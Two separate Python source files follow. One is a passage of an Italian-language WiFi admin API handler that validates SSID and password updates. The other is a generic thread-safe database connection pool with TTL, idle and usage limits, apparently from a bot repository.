set_api_response(response, self.response)
@staticmethod
def check(user, role, request, body):
response = {}
if body != "" and validate_format(request):
data = request.json
if 'tipo_operazione' in data and data['tipo_operazione'] in WiFiInfo.tipo_operazione:
response = WiFiInfo.check_user(user, role)
response = WiFiInfo.check_operation_param(response, data)
else:
if 'tipo_operazione' in data:
response['output'] = get_string(24, da_sostituire="tipo_operazione", da_aggiungere=', '.join(WiFiInfo.tipo_operazione))
else:
response['output'] = get_string(23, da_sostituire="tipo_operazione")
else:
if body != "":
response['output'] = get_string(22)
else:
response['output'] = get_string(21)
return response
@staticmethod
def check_user(user, role):
response = {}
if user is not None:
if role != 'ADMIN':
response['output'] = get_string(26)
else:
response['output'] = 'OK'
else:
response['output'] = get_string(25)
return response
@staticmethod
def check_operation_param(response, data):
if response['output'] == 'OK':
if data['tipo_operazione'] == 'update':
response = WiFiInfo.check_update(data)
return response
@staticmethod
def check_update(data):
response = {}
if 'wifi' in data and 'ssid' in data['wifi'] and 'psw' in data['wifi'] and data['wifi']['ssid'] != '' and data['wifi']['psw'] != '':
response['output'] = 'OK'
else:
if 'wifi' in data:
if 'ssid' in data['wifi']:
response['output'] = get_string(27, da_aggiungere="wifi.ssid")
else:
response['output'] = get_string(34, da_sostituire="wifi.ssid")
if 'psw' in data['wifi']:
response['output'] = get_string(27, da_aggiungere="wifi.psw")
else:
response['output'] = get_string(34, da_sostituire="wifi.psw")
else:
response['output'] = get_string(27, da_aggiungere="wifi")
return response
@staticmethod
def wifi_list():
response = {}
ap_list = DbManager.select_tb_net_device_and_msh_info(net_type='AP')
db_devices = DbManager.select_tb_net_device_and_msh_info()
wifi_ap_all_list = []
for ap in ap_list:
wifi_info = wifi_ap_info(ap['net_ip'], ap['net_usr'], ap['net_psw'], ap['net_code'])
if wifi_info['output'] == 'OK':
for wifi in wifi_info['result']:
trovato = False
net_config = {
"user": ap['net_usr'],
"password": ap['net_psw']
}
for db_device in db_devices:
if wifi['ssid'] == db_device['net_mac']:
DbManager.update_tb_net_device(wifi['ssid'], net_ip=ap['net_ip'], net_config=net_config)
trovato = True
break
if not trovato:
wifi['net_code'] = wifi['ssid']
wifi['net_mac_info'] = ap['net_mac']
trovato = Net.found_duplicate_code(wifi)
if trovato:
wifi['net_code'] = "SSID duplicato"
DbManager.insert_tb_net_device(wifi['ssid'], ap['net_ip'], wifi['ssid'],
wifi['net_mac_info'])
wifi_ap_all_list = wifi_ap_all_list + wifi_info['result']
response['wifi_ap'] = wifi_ap_all_list
wifi = DbManager.select_tb_wifi()
if not wifi:
response['default_ap'] = ""
else:
response['default_ap'] = wifi[0]
response['output'] = 'OK'
return response
@staticmethod
def wifi_update(wifi):
response = {}
if DbManager.select_tb_wifi():
DbManager.delete_tb_wifi()
DbManager.insert_tb_wifi(wifi['ssid'], wifi['psw'])
response['output'] = 'OK'
return response
|
<reponame>FlussuferOrga/ts-gw2-verifyBot
"""
Idea & Base from https://pypi.org/project/connection-pool/ https://github.com/zhouyl/ConnectionPool
Modification by https://github.com/Xyaren
"""
import logging
import queue
import threading
from typing import Callable, ContextManager, Generic, TypeVar
import time
LOG = logging.getLogger(__name__)
class ConnectionInitializationException(Exception):
"""When it was not possible to instantiate a new connection, throw this exception"""
class TooManyConnections(Exception):
"""When there are too many connections, throw this exception"""
class Expired(Exception):
"""When the connection is not available, throw this exception"""
class UsageExceeded(Expired):
"""The number of uses of the connection exceeds the limit"""
class TtlExceeded(Expired):
"""The connection usage time exceeds the life cycle specified by ttl"""
class IdleExceeded(Expired):
"""Idle time exceeds the time specified by idle"""
class Unhealthy(Expired):
"""Connection was unhealthy"""
_T = TypeVar("_T")
class WrapperConnection(ContextManager[_T]):
"""Used to package database connections in the connection pool to handle life cycle logic"""
connection: _T
def __init__(self, pool, connection: _T):
self.pool = pool
self.connection = connection
self.usage = 0
self.last = self.created = time.time()
def using(self):
"""Use this method when the connection is called, the number of uses increases by 1"""
self.usage += 1
self.last = time.time()
return self
def reset(self):
"""Reset connection package status"""
self.usage = self.last = self.created = 0
def __enter__(self) -> _T:
return self.connection
def __exit__(self, exc_type, exc_value, traceback):
self.pool.release(self)
def __str__(self):
return f"WrapperConnection[{self.connection}]"
class ConnectionPool(Generic[_T]):
"""Connection pool class, can be used for pymysql/memcache/redis/... 等
It can be called as follows:
pool = ConnectionPool(create=redis.Redis)
You can also specify the create call by lambda:
pool = ConnectionPool(create=lambda: redis.Redis(host="127.0.0.1"))
Or through functools.partial
from functools import partial
pool = ConnectionPool(create=partial(redis.Redis, host="127.0.0.1"))
"""
__wrappers = {}
def __init__(self,
create: Callable[[], _T],
destroy_function: Callable[[_T], None] = None,
checkout_function: Callable[[_T], None] = None,
test_function: Callable[[_T], bool] = None,
max_size: int = 10, max_usage: int = 0,
ttl: int = 0, idle: int = 60,
block: bool = True) -> None:
"""Initialization parameters
create: must be a callback function
destroy_function: optional, called on destruction
test_function: optional, called on returning the connection to the pool to test availability
max_size: The maximum number of connections. When it is 0, there is no limit. It is not recommended to set it to 0
max_usage: the number of times the connection can be used, after reaching this number, the connection will be released/closed
ttl: connection life time, unit (seconds), when the connection reaches the specified time, the connection will be released/closed
idle: connection idle time, unit (seconds), when the connection is idle for a specified time, it will be released/closed
block: When the number of connections is full, whether to block waiting for the connection to be released, input False to throw an exception when the connection pool is full
"""
if not hasattr(create, "__call__"):
raise ValueError('"create" argument is not callable')
self._create = create
self._destroy_function = destroy_function
self._checkout_function = checkout_function
self._test_function = test_function
self._max_size = int(max_size)
self._max_usage = int(max_usage)
self._ttl = int(ttl)
self._idle = int(idle)
self._block = bool(block)
self._lock = threading.Condition()
self._pool = queue.Queue()
self._size = 0
def item(self) -> WrapperConnection[_T]:
""" can be called by with ... as ... syntax
pool = ConnectionPool(create=redis.Redis)
with pool.item() as redis:
redis.set("foo","bar)
"""
self._lock.acquire()
try:
while self._max_size and self._pool.empty() and self._size >= self._max_size:
if not self._block:
raise TooManyConnections("Too many connections")
self._lock.wait() # Wait for idle connection
try:
wrapped = self._pool.get_nowait() # Get one from the free connection pool
# test connection before handing it out
try:
self._test(wrapped)
except Expired as ex: # connection was not healthy
LOG.info("Connection %s was expired on checkout", wrapped, exc_info=ex)
self._destroy(wrapped, f"Expired on checkout: {ex}")
return self.item() # recursion: now that the bad connection is removed from the pool start over.
except queue.Empty: # no connection in pool
wrapped = None
if wrapped is None:
try:
wrapped = self._wrapper(self._create()) # Create new connection
LOG.debug("Connection %s created", wrapped)
self._size += 1
except Exception as ex:
raise ConnectionInitializationException("A new connection for the pool could not be created.") from ex
else:
LOG.info("Connection %s will be checked out from the pool", wrapped)
finally:
self._lock.release()
if self._checkout_function:
self._checkout_function(wrapped.connection)
return wrapped.using()
def release(self, conn):
"""Release a connection, let the connection return to the connection pool
When the connection usage exceeds the limit / exceeds the limit time, the connection will be destroyed
"""
self._lock.acquire()
wrapped = self._wrapper(conn)
try:
self._test(wrapped)
except Expired as ex:
self._destroy(wrapped, f"Expired on release: {ex}")
else:
LOG.debug("Connection %s will be released into the pool", wrapped)
self._pool.put_nowait(wrapped)
self._lock.notifyAll() # Notify other threads that there are idle connections available
finally:
self._lock.release()
def _destroy(self, wrapped, reason):
"""Destroy a connection"""
LOG.debug("Connection %s will be destroyed. Reason: %s", wrapped, reason)
if self._destroy_function is not None:
self._destroy_function(wrapped.connection)
self._unwrapper(wrapped)
self._size -= 1
def _wrapper(self, conn: _T) -> WrapperConnection[_T]:
if isinstance(conn, WrapperConnection):
return conn
_id = id(conn)
if _id not in self.__wrappers:
self.__wrappers[_id] = WrapperConnection(self, conn)
return self.__wrappers[_id]
def _unwrapper(self, wrapped):
"""Unwrap the connection"""
if not isinstance(wrapped, WrapperConnection):
return
_id = id(wrapped.connection)
wrapped.reset()
del wrapped
if _id in self.__wrappers:
del self.__wrappers[_id]
def _test(self, wrapped):
"""Test the availability of the connection, and throw an Expired exception when it is not available"""
if self._max_usage and wrapped.usage >= self._max_usage:
raise UsageExceeded("Usage exceeds %d times" % self._max_usage)
if self._ttl and (wrapped.created + self._ttl) < time.time():
raise TtlExceeded("TTL exceeds %d secs" % self._ttl)
if self._idle and (wrapped.last + self._idle) < time.time():
raise IdleExceeded("Idle exceeds %d secs" % self._idle)
if self._test_function:
try:
is_healthy = self._test_function(wrapped.connection)
except Exception as ex:
raise Unhealthy("Connection test determined that the connection is not healthy by exception") from ex
if not is_healthy:
raise Unhealthy("Connection test determined that the connection is not healthy")
def close(self):
self._lock.acquire()
try:
q = self._pool
for _ in range(0, self._size):
try:
self._destroy(q.get(timeout=10), "Pool closing")
except queue.Empty:
pass
finally:
self._lock.release()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.